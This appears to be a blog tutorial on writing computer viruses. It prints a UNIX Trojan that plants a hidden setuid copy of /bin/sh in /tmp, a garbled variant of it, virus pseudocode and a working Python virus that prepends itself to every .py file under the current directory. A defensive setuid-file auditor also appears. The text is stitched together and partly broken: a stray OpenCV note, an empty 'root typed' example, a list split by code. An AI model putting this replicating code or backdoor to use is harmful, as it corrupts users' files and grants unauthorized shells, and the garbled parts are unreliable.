How to make Computer Virus Using Python – Within 10 Minutes. Newbie to Advance Tutorials.

NOTE: Please don't use an online compiler; it is not going to work here. Please install Python 2.7x to the latest version and the cv2 (OpenCV) and argparse modules to actually try out this example.

Hey friends! Welcome back! Before continuing on with Malicious Logic, after reading this blog you will be able to make a Computer Virus Using Python – Within 10 Minutes. Newbie to Advance Tutorials.

Now, this article will focus more on applications than the theory of computer viruses, worms, and Trojan horses.

But please note that this article is meant to be used for educational purposes only. I am not promoting the usage of viruses, worms, or Trojan horses to attack computer systems and cause damage.

What is Malicious logic?

Malicious logic is a set of instructions (basically a program) that causes the violation of a security policy of a website/program/application, etc.

    cp /bin/sh /tmp/.xxsh
    chmod u+s,o+x /tmp/.xxsh
    rm ./ls
    ls $*

UNIX Script

In this example, we are assuming that “………” is in the path environment and the script has been named ls and is placed in the directory.

Analyzing the script


This script creates a copy of the UNIX shell that is setuid to the user executing this program. To understand setuid programs, we first need to understand how user identity is stored in a UNIX OS.
In a UNIX OS, user identity is usually represented as an integer between zero and, generally, 65,535. This number is also called the UID (Unique Identification Number). What setuid programs do is create processes with the UID of the owner, not of the third person executing the program. This means that the executor will have the rights of the owner. This in itself is a possible vulnerability.
Coming back to our script: a setuid copy of the UNIX shell was created. Later on, this program is deleted, after which the correct ls command (for listing the files and folders present in the current working directory) is executed.
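From the defender's side, the setuid copy of the shell described above is the artifact to look for. The following is an added example, not code from the original article: it walks a directory and reports setuid regular files, noting when one is world-executable, has a hidden name, or is byte-identical to a system shell. The names `REFERENCE_SHELLS`, `sha256_of`, `classify` and `audit` are assumptions made for this illustration.

```python
import hashlib
import os
import stat

# Assumption: reference shells to compare against; adjust the list per system.
REFERENCE_SHELLS = ("/bin/sh", "/bin/bash", "/bin/dash")

def sha256_of(path):
    """Hash a file in chunks so large binaries are not read into memory at once."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()

def classify(mode, name, digest, shell_digests):
    """Return the reasons a file stands out; empty list if it is not a setuid file."""
    if not (stat.S_ISREG(mode) and mode & stat.S_ISUID):
        return []
    reasons = ["setuid"]
    if mode & stat.S_IXOTH:
        reasons.append("world-executable")
    if name.startswith("."):
        reasons.append("hidden name")
    if digest in shell_digests:
        reasons.append("byte-identical to a system shell")
    return reasons

def audit(root, reference_shells=REFERENCE_SHELLS):
    """Walk root and map each setuid regular file to the reasons it stands out."""
    shell_digests = {sha256_of(p) for p in reference_shells if os.path.isfile(p)}
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                mode = os.lstat(path).st_mode  # lstat: do not follow symlinks
                digest = sha256_of(path) if stat.S_ISREG(mode) and mode & stat.S_ISUID else None
            except OSError:
                continue  # unreadable or vanished file: skip it
            reasons = classify(mode, name, digest, shell_digests)
            if reasons:
                findings[path] = reasons
    return findings

if __name__ == "__main__":
    for path, reasons in audit("/tmp").items():
        print(path, "->", ", ".join(reasons))
```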

Trojan Horses

Go back to the previous script… Suppose someone (root) typed:

If the script was typed deliberately, then it will result in a Trojan Horse.

Virus – A basic format

Most computer viruses follow the following basic script:

    cp /bin/sh /tmp/.xxsh
    chmod o+s,w+x /tmp.xxsh

Beginvirus
if spread-condition TRUE then begin
    for the target files begin
       if target affected TRUE then begin
          Determine where to place virus instructions
          Copy the virus instructions
          Modify target to spread the virus later
       End if
    End for
End if
Perform some other instruction(s) //Optional
Go back to beginning
Endvirus

Basically, every computer virus has two phases –

#!/usr/bin/python
import os, datetime, inspect
DATA_TO_INSERT = "CODEWITHNEPAL"

#search for target files in path
def search(path):
	filestoinfect = []
	filelist = os.listdir(path)
	for filename in filelist:
		
		#If it is a folder
		if os.path.isdir(path+"/"+filename):
			filestoinfect.extend(search(path+"/"+filename))
			
		#If it is a python script -> Infect it	
		elif filename[-3:] == ".py":
			
			#default value
			infected = False
			for line in open(path+"/"+filename):
				if DATA_TO_INSERT in line:
					infected = True
					break
			if infected == False:
				filestoinfect.append(path+"/"+filename)
	return filestoinfect

#changes to be made in the target file
def infect(filestoinfect):
	target_file = inspect.currentframe().f_code.co_filename
	virus = open(os.path.abspath(target_file))
	virusstring = ""
	for i,line in enumerate(virus):
		if i>=0 and i <41:
			virusstring += line
	virus.close
	for fname in filestoinfect:
		f = open(fname)
		temp = f.read()
		f.close()
		f = open(fname,"w")
		f.write(virusstring + temp)
		f.close()
		
#Not required actually		
def explode():
	if datetime.datetime.now().month == 4 and datetime.datetime.now().day == 1:
			print ("HAPPY APRIL FOOL'S DAY!!")
filestoinfect = search(os.path.abspath(""))
infect(filestoinfect)
explode()
  1. Insertion phase – in this phase, the virus inserts itself into the target.
  2. Execution phase – in this phase, the virus performs some actions.

Let’s take a look at a real virus in Python. Now, this is not an actual virus that will cause file corruption, deletion of system files, etc., but just a simple harmless virus.
